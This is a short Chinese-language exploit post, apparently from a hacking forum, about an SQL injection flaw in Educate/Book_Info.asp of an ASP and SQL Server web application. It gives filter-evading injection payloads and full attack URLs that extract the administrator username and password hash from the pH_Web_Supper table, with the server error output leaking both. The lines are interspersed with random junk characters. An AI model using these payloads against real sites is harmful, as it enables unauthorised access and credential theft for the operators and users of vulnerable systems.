漏洞出现在Educate/Book_Info.asp 7 N; `' n" ?3 h1 x; R
1 f3 J3 G |% V8 f3 C& Y: l此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
* W# @- F& e5 { : J% |+ Q. j: V; ?1 z$ l& U
exp:如下 m- r6 Z5 b/ I/ Y3 c& w; o& s
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
, C$ n: x; y; D& C3 z; O查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
% T1 D4 x9 m% J: P
0 V- ~$ d6 W. }6 l, C) [http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
& e. d( L# N* |0 R* n+ S; l" i W/ e+ c8 ?( k' g2 A
Microsoft OLE DB Provider for SQL Server 错误 '80040e07', t1 P3 a& V6 T, g- H' c
\0 V( F! O. F! R5 ]
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
+ O3 I5 T! z% c8 J( `
8 W3 N9 V2 e) M' j/Educate/Book_Info.asp,行 8
' B$ ?! d- k/ x* }
# t4 C; L& _3 B) m, o9 Yhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
! O' O5 t- q1 W: I* P+ I% I, \ : l2 N; e7 B1 s
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'7 g( X/ z+ u" D, u4 w* T# ?
1 c- m( R. B) p; j: f' S/ B; M
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。7 h" }% G( A% u a o
: j- V2 @+ W3 V1 a3 \8 `/Educate/Book_Info.asp,行 8
2 h& z# _+ [: C |